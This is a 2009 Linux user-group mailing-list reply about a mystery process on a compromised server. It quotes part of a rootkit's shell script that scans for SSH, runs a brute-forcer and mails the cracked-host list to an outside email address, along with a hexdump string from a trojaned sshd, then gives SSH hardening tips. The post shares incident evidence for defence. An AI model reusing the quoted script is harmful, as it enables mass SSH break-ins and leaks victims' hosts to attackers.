[clug] mc-root anyone?

Edward Lang edlang at edlang.org
Thu Jun 18 14:58:57 GMT 2009


Hi,

On Thu, Jun 18, 2009 at 2:34 PM, Michael Still<mikal at stillhq.com> wrote:
> Two questions:
>
>  - is there anything else I should do to this machine?

I vaguely touched on this topic a few months ago:

http://lists.samba.org/archive/linux/2009-April/022937.html

I still haven't found a satisfactory answer for my own personal
machines -- I don't have an army of operators and monitoring monkeys
at my private disposal...

>  - does anyone else know what this thing is? Bing searching doesn't turn
> much up.

The rootkit I had installed on my server contained this snippet:

[...]
echo -e "ssh bruteforce tool\n\r\t - by kaz\n\n"
./scan $1 22

sleep 10
cat $1.pscan.22 |sort |uniq > ip.conf
oopsnr2=`grep -c . ip.conf`
echo "# Am gasit $oopsnr2 servere."
echo "----------------------------------------"
mv ip.conf mfu.txt
./brute 100
rm -rf $1.pscan.22 ip.conf 1>/dev/null 2>/dev/null
cat vuln.txt | mail -s "noi" buzaionvasile at yahoo.com
echo "# Bahhh incearca alt ip ca asta e de-an polea."
[...]

Not sure if it's similar or useful for you in this instance. The
rootkit also included its own statically linked sshd containing this
string:

00a0400: 5353 4820 6272 7574 6566 6f72 6365 720a  SSH bruteforcer.
00a0410: 0d09 202d 2062 7920 6c69 7a61 7264 0a09  .. - by lizard..

... but you've already mentioned you're upgrading all your packages.

I like the recommendation of forcing the use of RSA / DSA keys for
SSH. Mimicking AIX's ``rlogin'' user attribute with PAM would be
handy, too, for those accounts that don't require the ability to
remotely login.

Regards,

Edward.

-- 
Edward C. Lang

http://edlang.org/


More information about the linux mailing list